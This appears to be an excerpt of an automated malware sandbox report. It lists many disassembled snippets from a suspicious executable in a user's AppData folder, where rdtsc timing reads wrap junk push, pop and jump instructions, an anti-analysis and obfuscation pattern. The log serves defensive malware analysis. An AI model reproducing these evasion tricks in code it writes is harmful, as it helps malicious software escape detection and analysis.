Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C69A second address: 96C6E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5828CEC30Eh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124492F7h], eax 0x00000014 lea eax, dword ptr [ebp+1247FFB0h] 0x0000001a mov dx, 4AC5h 0x0000001e nop 0x0000001f jmp 00007F5828CEC315h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jnp 00007F5828CEC308h 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C6E2 second address: 96C6EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F5828704A6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997657 second address: 99766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5828CEC314h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997A93 second address: 997A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997A99 second address: 997AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997AA7 second address: 997AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997AAD second address: 997AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997AB3 second address: 997AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997AB7 second address: 997ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC310h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F5828CEC30Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997D94 second address: 997D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997D9A second address: 997DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F5828CEC30Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 997DB3 second address: 997DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jc 00007F5828704A66h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99E155 second address: 99E159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99E159 second address: 99E1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5828704A77h 0x0000000b jmp 00007F5828704A6Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5828704A77h 0x00000017 jmp 00007F5828704A6Ah 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99E1A8 second address: 99E1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99CE36 second address: 99CE46 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828704A66h 0x00000008 jo 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99CE46 second address: 99CE85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5828CEC306h 0x00000012 jmp 00007F5828CEC319h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99CFF5 second address: 99D045 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5828704A72h 0x00000008 pop esi 0x00000009 pushad 0x0000000a je 00007F5828704A66h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jbe 00007F5828704A66h 0x00000018 jmp 00007F5828704A6Eh 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 jmp 00007F5828704A72h 0x00000027 push edx 0x00000028 pop edx 0x00000029 pop ecx 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99D199 second address: 99D1AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828CEC306h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99D353 second address: 99D37A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A79h 0x00000009 jmp 00007F5828704A6Ah 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99D5E0 second address: 99D5E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99D73E second address: 99D76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A74h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5828704A6Ch 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99C87D second address: 99C885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99C885 second address: 99C8AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F5828704A66h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 99C8AC second address: 99C8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3E4C second address: 9A3E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F5828704A79h 0x00000015 jmp 00007F5828704A73h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3E74 second address: 9A3E79 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92E123 second address: 92E12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2B66 second address: 9A2B9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F5828CEC315h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5828CEC30Eh 0x0000001a jnc 00007F5828CEC306h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2B9F second address: 9A2BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2CE2 second address: 9A2CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2CE8 second address: 9A2CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2CED second address: 9A2D14 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC30Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jng 00007F5828CEC306h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5828CEC312h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A2D14 second address: 9A2D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5828704A75h 0x00000010 jmp 00007F5828704A6Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3117 second address: 9A312D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828CEC306h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jg 00007F5828CEC306h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A325A second address: 9A3260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3260 second address: 9A3264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3264 second address: 9A3279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3279 second address: 9A3287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5828CEC306h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A36E1 second address: 9A36E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A36E5 second address: 9A3706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Dh 0x00000007 ja 00007F5828CEC306h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F5828CEC306h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3706 second address: 9A370A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A370A second address: 9A3728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F5828CEC312h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A3728 second address: 9A372C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A6B5B second address: 9A6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A6B5F second address: 9A6B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5828704A78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5828704A71h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A6B8E second address: 9A6BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC315h 0x00000007 push edi 0x00000008 jg 00007F5828CEC306h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5828CEC318h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92C64F second address: 92C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD5DD second address: 9AD5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD5E1 second address: 9AD5F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD5F0 second address: 9AD5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5828CEC306h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD149 second address: 9AD16B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A78h 0x00000007 jnc 00007F5828704A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD16B second address: 9AD1AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 jmp 00007F5828CEC313h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5828CEC316h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD303 second address: 9AD30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD30D second address: 9AD311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B078F second address: 9B07AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5828704A75h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B07AE second address: 9B07D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5828CEC317h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9291AF second address: 9291B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B00DE second address: 9B010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC318h 0x00000007 jmp 00007F5828CEC30Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B0233 second address: 9B0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B4568 second address: 9B4572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F5828CEC306h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B3C44 second address: 9B3C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5828704A6Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B41EB second address: 9B41EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B41EF second address: 9B4203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5828704A72h 0x0000000c jns 00007F5828704A66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B4203 second address: 9B4214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828CEC30Bh 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B4214 second address: 9B4218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B7BBC second address: 9B7BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B7BC0 second address: 9B7BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A73h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B7BD9 second address: 9B7BE3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5828CEC312h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B7BE3 second address: 9B7BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BD838 second address: 9BD852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC315h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BD9C4 second address: 9BD9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDB98 second address: 9BDBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 jg 00007F5828CEC312h 0x0000000d jns 00007F5828CEC306h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDCEF second address: 9BDD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F5828704A6Fh 0x0000000b popad 0x0000000c pop ebx 0x0000000d ja 00007F5828704A86h 0x00000013 jmp 00007F5828704A76h 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDE96 second address: 9BDE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDE9B second address: 9BDEC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A78h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F5828704A66h 0x00000010 jno 00007F5828704A66h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDEC3 second address: 9BDEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C13F second address: 96C153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C153 second address: 96C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C159 second address: 96C15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C15D second address: 96C199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5828CEC318h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5828CEC30Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BE300 second address: 9BE31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828704A79h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BE31F second address: 9BE323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BEC48 second address: 9BEC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BEC4C second address: 9BEC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C75C5 second address: 9C75E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F5828704A73h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C75E4 second address: 9C7600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F5828CEC31Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C568E second address: 9C5692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C5BFA second address: 9C5C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828CEC317h 0x0000000a push eax 0x0000000b jmp 00007F5828CEC313h 0x00000010 jmp 00007F5828CEC30Ch 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C5C3A second address: 9C5C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
